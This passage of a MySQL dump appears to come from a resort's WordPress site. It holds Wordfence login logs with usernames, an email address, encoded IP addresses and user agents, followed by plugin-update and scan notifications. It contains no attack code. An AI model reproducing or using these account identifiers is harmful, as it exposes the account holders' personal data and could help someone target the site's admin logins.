Firefox/63.0'),(15,101673,1544149752.061205,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:63.0) Gecko/20100101 Firefox/63.0'),(16,102234,1544292124.681487,1,'loginFailValidUsername','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0@vF','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(17,103389,1544491207.702059,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:63.0) Gecko/20100101 Firefox/63.0'),(18,104307,1544645190.539335,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0@vF','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(19,104323,1544647691.034648,1,'loginFailValidUsername','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0@vF','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(20,104324,1544647714.303236,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0@vF','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(21,105317,1544807734.390896,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:64.0) Gecko/20100101 Firefox/64.0'),(22,106913,1545069866.685069,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0@vF','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(23,113546,1546390339.904302,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:64.0) Gecko/20100101 Firefox/64.0'),(24,121005,1547511913.044450,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:64.0) Gecko/20100101 Firefox/64.0'),(25,162240,1554064713.665598,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(26,163294,1554217170.627831,1,'loginFailInvalidUsername','dbeneke',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(27,163295,1554217206.521965,1,'loginFailInvalidUsername','dbeneke',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(28,163296,1554217217.777898,1,'loginFailInvalidUsername','dbeneke',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(29,163298,1554217282.070788,1,'loginFailInvalidUsername','dbeneke',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(30,163305,1554218472.341364,1,'loginFailInvalidUsername','dbeneke',0,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(31,163306,1554218510.380966,1,'loginFailInvalidUsername','dbeneke',0,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(32,163307,1554218523.525402,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(33,163309,1554219076.042287,1,'loginFailValidUsername','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(34,163310,1554219119.474952,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(35,163605,1554258864.486336,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(36,163755,1554293987.304657,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(37,165493,1554687689.929248,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(38,165849,1554771272.639895,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(39,165866,1554772310.333095,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(40,165871,1554773175.256032,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(41,165873,1554773299.847743,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(42,165879,1554773685.525257,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(43,165884,1554774230.309042,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(44,165933,1554781890.141155,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(45,165934,1554782067.524977,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(46,165935,1554782247.182271,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(47,165936,1554808696.276229,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(48,165940,1554817815.836783,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(49,165941,1554818959.276968,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(50,165946,1554853935.311742,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(51,165947,1554854046.590597,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(52,165962,1554942857.986158,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(53,165963,1554942973.605073,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(54,165989,1555002896.931417,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0lM','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(55,166067,1555388473.173471,1,'loginFailInvalidUsername','ashbyresort.com',0,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(56,166068,1555388573.642572,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(57,166210,1555638823.946978,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(58,166550,1556500270.373233,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(59,166758,1557359316.355887,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:66.0) Gecko/20100101 Firefox/66.0'),(60,167018,1558185658.746989,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(61,167019,1558187300.958916,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(62,167020,1558279069.156449,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(63,167021,1558279242.233009,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(64,167022,1558279332.113113,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(65,167023,1558279759.096331,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(66,167103,1558525437.210448,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(67,167104,1558525982.167274,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(68,167432,1559477622.796598,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(69,167436,1559478395.146072,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(70,167476,1559652399.481079,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(71,167477,1559654631.781975,0,'logout','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(72,167567,1560220565.790852,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(73,167836,1560468181.013161,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:67.0) Gecko/20100101 Firefox/67.0'),(74,170102,1561484080.422995,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0a`','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:67.0) Gecko/20100101 Firefox/67.0'),(75,170103,1561484647.043279,0,'loginOK','ashbyresort@hotmail.com',2,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(76,170343,1562774199.428294,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(77,170652,1563228153.855975,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),(78,171946,1564831573.154819,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(79,172807,1565363382.030838,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(80,172877,1565900546.434961,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(81,172892,1566431105.864338,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(82,173123,1567030572.288932,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(83,173148,1568126313.897437,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),(84,173405,1571502488.066815,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:69.0) Gecko/20100101 Firefox/69.0'),(85,173406,1571504522.070956,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:69.0) Gecko/20100101 Firefox/69.0'),(86,173459,1572547075.906076,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15'),(87,173460,1572547216.457842,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(88,173528,1573557148.597748,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'),(89,173638,1574861887.363938,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(90,173640,1575718433.063846,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(91,173879,1577139278.596745,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:71.0) Gecko/20100101 Firefox/71.0'),(92,173902,1577810224.305272,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(93,173941,1579548292.758942,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0a`','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(94,173954,1580430873.010390,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(95,173963,1580745977.574500,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(96,174069,1582325216.482219,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0a`','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(97,174077,1583115247.938814,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36'),(98,174117,1584580642.078647,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(99,174209,1585782774.045457,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(100,174419,1587763000.302493,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(101,174420,1587763157.230889,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36'),(102,174440,1587823586.461128,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(103,174590,1588519280.388566,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(104,174591,1589139266.047477,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),(105,174761,1589330368.370034,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(106,174831,1591056065.748847,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36'),(107,174856,1592228932.642231,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'),(108,174885,1592669033.178414,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'),(109,174899,1593651742.077308,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(110,174900,1593686980.323315,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(111,174902,1594316924.210731,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(112,174918,1595642133.585784,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(113,174937,1596047583.319376,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(114,174956,1596676810.413039,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(115,174969,1598182225.460279,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),(116,174970,1598357863.847543,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),(117,174971,1598359641.080746,0,'loginOK','Dean',3,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),(118,174972,1598819624.240028,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),(119,174976,1599096186.632372,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'),(120,175029,1602338113.189799,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(121,175060,1604081839.999304,0,'loginOK','ashmin',1,'\0\0\0\0\0\0\0\0\0\0/ˉ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36');
/*!40000 ALTER TABLE `ar_wfLogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfNotifications`
--

DROP TABLE IF EXISTS `ar_wfNotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfNotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfNotifications`
--

LOCK TABLES `ar_wfNotifications` WRITE;
/*!40000 ALTER TABLE `ar_wfNotifications` DISABLE KEYS */;
INSERT INTO `ar_wfNotifications` VALUES ('site-AEAAAAA',0,'wfplugin_updates',502,1523926450,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-AIAAAAA',0,'wfplugin_scan',502,1523926450,'<a href=\"http://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-L4AAAAA',0,'wfplugin_updates',502,1524613289,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-MAAAAAA',0,'wfplugin_scan',502,1524613289,'<a href=\"http://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-PAAAAAA',0,'wfplugin_updates',502,1542327506,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-PEAAAAA',0,'wfplugin_scan',502,1542327506,'<a href=\"http://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-QUBQAAA',0,'wfplugin_updates',502,1543283567,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-QYBQAAA',0,'wfplugin_scan',502,1543283567,'<a href=\"http://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-XIBQAAA',0,'wfplugin_updates',502,1558282238,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-XMBQAAA',0,'wfplugin_scan',502,1545011593,'<a href=\"http://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-LQDAAAA',0,'wfplugin_updates',502,1560469629,'<a href=\"http://ashbyresort.com/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-CYCAAAA',0,'wfplugin_scan',502,1547083253,'<a href=\"http://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">7 issues found in most recent scan</a>','[]'),('site-OYCAAAA',0,'wfplugin_scan',502,1591056291,'<a href=\"https://ashbyresort.com/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent 